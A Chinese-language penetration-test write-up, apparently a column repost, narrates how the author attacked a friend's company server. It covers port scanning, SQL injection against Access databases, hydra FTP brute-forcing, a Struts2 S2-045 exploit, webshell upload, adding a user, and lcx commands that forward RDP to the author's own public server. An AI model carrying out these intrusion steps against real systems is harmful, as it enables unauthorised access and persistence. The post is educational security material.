記一次扎心的滲透測試

記一次扎心的滲透測試

來自專欄網安實驗室24 人贊了文章

原創： MOZA

合天智匯

0x00 前言

前幾天朋友叫我幫忙測試一下他公司的站點，由於他是苦逼開發狗，本身公司又沒有做安全部門，所以他兼顧了開發與安全測試，便有了以下的文章。

0x01 信息探測

目標:http://www.xxx.com

首先多地ping一下看是否存在cdn

都是同一個ip看來並不存在cdn 或許是朋友為了方便我測試而把cdn撤掉了..

既然沒有cnd那就直接就這個ip來進行探測，首先掃描一下埠，由於存在防火牆這裡並不能用全連接掃描，我們用半開掃描且加上了代理池，這裡我用我自己寫的py腳本進行。

開放了一千多個埠... 我一度懷疑這是他故意開放來混淆或者整個伺服器就是個蜜罐。

由於我這個腳本並沒有服務版本識別，所以這裡需要藉助nmap來識別埠服務。

現在我們來總結一下埠服務的信息：

FTP埠大概開十個，很可能是各個部門的ftp空間。

3389與及資料庫的埠都沒發現，

Web服務的埠有五個。

Web的信息收集。

伺服器為win，web容器有apace與及iis6.0和iis8.5很可能是win2008.

Web的cms識別一下

並沒有結果，進行目錄掃描

似乎找到了後台

0x02滲透階段

由於掃描會被防火牆ban掉，我手測了漫長的時間後，終於找到了一處注入，內心想這次還不拿下了？

但事情沒有我想的那麼簡單... 如下圖

Access的資料庫極其不友好 ，一張表都跑不出來！

PS：sqlmap做了代理池與及加了base64encode.py，charunicodeencode.py。

Access的資料庫並不支持os-shell，而且我沒辦法爆破絕對路徑所以sql寫shell的路也被塞死了。

存在反射型xss。

由於沒有留言審核等等功能，qq聯繫方式也沒有，並且網站管理員很可能是我朋友，所以社工欺騙讓他點擊的可能性極低，故放棄此路。

故而轉向其他埠的web程序，20440埠發現存在一個企業簡訊的平台

谷歌並沒有發現相關0day 目錄掃描也沒存在有用的文件，不過驗證碼是簡單的數字，可以用py識別用來fuzz爆破，並且考慮我朋友是管理員的可能性，可以有針對性的生成字典進行爆破。

還有那十多個ftp埠也可以用此字典來爆破，ftp我選擇用hydra來爆破如下圖：

其中-s參數為指定埠 -L為指定用戶名文件 -P為指定密碼文件

然而爆破了大半天還是沒有任何結果。

這時候我把目光放在了第三個web程序上，看起來像是一個未完成的test樣品網站。

在這個web上我在某一連接上找到了sql注入。

不出所料依然還是Access的資料庫，希望能跑出表

令人開心的是這次跑出了一個admin表，我頓時興奮了起來。

終於拿到賬號密碼，心想找到後台的話，登陸getshell還不很舒服，然後我拿出了我3w字典，並沒有掃出任何關於後台的目錄...

但是機智如我發現了一些規律比如說這是產品的目錄

這是技術支持的目錄

這是新聞的目錄

然後僅過了漫長的測試，終於找到了後台。如下圖

夠中式...

然後開開心登陸，這回應該沒啥問題了。然而

後台居然登陸不上去???我內心一度懷疑人生。

但我在某一頁面的注釋上發現了一個github的地址

跟進去找到了一些網站建設規劃，與及這個網站的mdb文件，我估計是我朋友的上司開發的這個cms，首先看看mdb文件

賬號密碼跟我注入得到的是一樣的，所以的確是該cms的後台壞掉了。

但是我在網站建設規劃中發現了這台伺服器不僅僅是他們公司的對外的官網伺服器，而且還是對內自己開發測試的伺服器，在20549埠中我用st2-045拿到了許可權，並且上傳了一句話和大馬，嘗試連接3389。

然而事情沒有我想的那麼簡單，首先3389埠是開放的。

添加用戶也可以成功。

但是3389 連不上。

考慮是內網等等，所以用lcx轉發。

目標機器執行lcx1.exe -slave 自己伺服器的公網ip 接受數據的埠 本機ip 要轉發的埠

公網伺服器上執行lcx1 -listen 接受數據的埠 本機映射的埠

已經成功接收到數據

遠程連接本地轉發埠即可

0x03總結

心細最重要，不放過任何一絲一毫的信息。

共勉。

文章僅用於普及網路安全知識，提高小夥伴的安全意識的同時介紹常見漏洞的特徵等，若讀者因此作出危害網路安全的行為後果自負，與合天智匯以及原作者無關，特此聲明！

推薦閱讀：